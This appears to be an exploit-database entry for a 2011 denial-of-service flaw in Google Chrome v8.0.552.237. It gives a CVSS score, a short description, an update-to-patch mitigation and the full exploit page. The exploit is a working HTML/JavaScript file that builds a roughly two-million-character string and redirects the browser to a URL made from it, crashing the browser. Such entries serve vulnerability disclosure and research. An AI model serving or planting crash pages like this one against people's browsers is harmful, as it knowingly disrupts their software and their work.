header-logo
Suggest Exploit
vendor:
Chrome
by:
Vuk Ivanovic
7.5
CVSS
HIGH
Address Overflow DoS
119
CWE
Product Name: Chrome
Affected Version From: v8.0.552.237
Affected Version To: v8.0.552.237
Patch Exists: YES
Related CWE: N/A
CPE: a:google:chrome
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP, SP2 (EN), Windows 7 x64
2011

Google Chrome v8.0.552.237 address overflow DoS

This exploit is a Denial of Service (DoS) vulnerability in Google Chrome v8.0.552.237. It is triggered by a maliciously crafted URL that causes an address overflow in the browser. This causes the browser to crash, resulting in a DoS condition.

Mitigation:

Users should update to the latest version of Google Chrome to ensure they are not vulnerable to this exploit.
Source

Exploit-DB raw data:

<html>
<head>


# Title: Google Chrome v8.0.552.237 address overflow DoS

# CVE-ID: ()

# OSVDB-ID: ()

# Author: Vuk Ivanovic

# Published: 2011-01-17

# Verified: yes
 

# Google Chrome v8.0.552.237 address overflow DoS


#
# Tested on: Windows XP, SP2 (EN), Windows 7 x64

#
# Date tested: 01/16/2011
#
#
# 

# Discovered by: Vuk Ivanovic(musashi42)
# 
## 

<script type="text/javascript">

function mul3 (str, num) {
	if (!num) return "";
	var	orig = str,
		soFar = [str],
		added = 1,
		left, i;
	while (added < num) {
		left = num - added;
		str = orig;
		for (i = 2; i < left; i *= 2) {
			str += str;
		}
		soFar.push(str);
		added += (i / 2);
	}
	return soFar.join("");

}

var junka = "a";

var junk = mul3(junka,2097033);


window.location.href = "http://" + junk;


</script>
</head>

<body>

</body>
</html>